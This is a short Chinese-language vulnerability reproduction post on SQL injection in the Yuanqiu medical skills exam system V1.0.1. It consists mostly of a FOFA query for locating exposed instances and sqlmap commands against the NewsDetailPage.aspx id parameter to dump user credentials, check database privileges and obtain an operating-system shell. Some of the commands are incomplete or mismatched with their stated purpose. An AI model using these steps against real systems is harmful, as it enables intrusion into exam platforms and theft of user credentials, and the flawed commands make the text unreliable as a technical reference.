漏洞简介
远秋医学在线考试考试系统采用通用的试题库管理软件。存在SQL注入漏洞,攻击者可以通过该漏洞getshell。
FOFA语句
app="远秋医学技能考试系统-V1.0.1"
影响范围
远秋医学技能考试系统-V1.0.1
漏洞复现
访问网站,文章处的id存在注入
检测是否存在注入点,sqlmap语句
sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=7"
有些是经过了加密的注入不了,有大佬会的记得教教我呀!
sqlmap跑用户和密码
sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=7" -users sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=7" --password
查看是否为dba权限,sql语句
sqlmap -u "http://xxx.xxx.xxx.xxx/zzpjmz/WJList?cfpj=&sflx=sPbVwxF9"
--os-shell获得shell,sql语句
sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=7"
